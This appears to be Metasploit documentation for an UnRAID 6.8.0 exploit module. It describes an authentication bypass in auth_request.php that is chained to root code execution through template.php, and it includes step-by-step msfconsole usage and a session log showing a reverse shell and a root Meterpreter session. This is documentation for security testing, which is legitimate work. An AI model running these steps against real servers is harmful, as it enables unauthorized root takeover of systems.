adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
4975b8d89444ca302bdf290dcfa53ae967f264f6
metasploit-gs/documentation/modules/exploit/linux/http/unraid_eval.md
T
Nicolas Chatelain 4975b8d894 Add unraid exploit documentation
2020-03-20 15:33:20 +01:00

1.4 KiB
Raw Blame History

Vulnerable Application

This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password.

Description

This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in auth_request.php and then performs remote code execution as root by abusing the extract function used in the template.php file.

Testing Environment

Setup Unraid 6.8.0 according to the UnRAID Getting Started guide.

Verification Steps

  1. Setup UnRAID 6.8.0
  2. Start msfconsole
  3. use exploit/linux/http/unraid_eval
  4. set RHOST [UNRAID]
  5. check
  6. run
  7. You should get a new root session

Options

None.

Scenarios

msf5 > use exploit/linux/http/unraid_eval
msf5 exploit(linux/http/unraid_eval) > set RHOSTS 10.10.0.173
RHOSTS => 10.10.0.173
msf5 exploit(linux/http/unraid_eval) > check
[*] 10.10.0.173:80 - The target appears to be vulnerable.
msf5 exploit(linux/http/unraid_eval) > run

[*] Started reverse TCP handler on 10.10.0.161:4444 
[*] Sending stage (38288 bytes) to 10.10.0.173
[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100

meterpreter > getuid
Server username: root (0)
Reference in New Issue View Git Blame Copy Permalink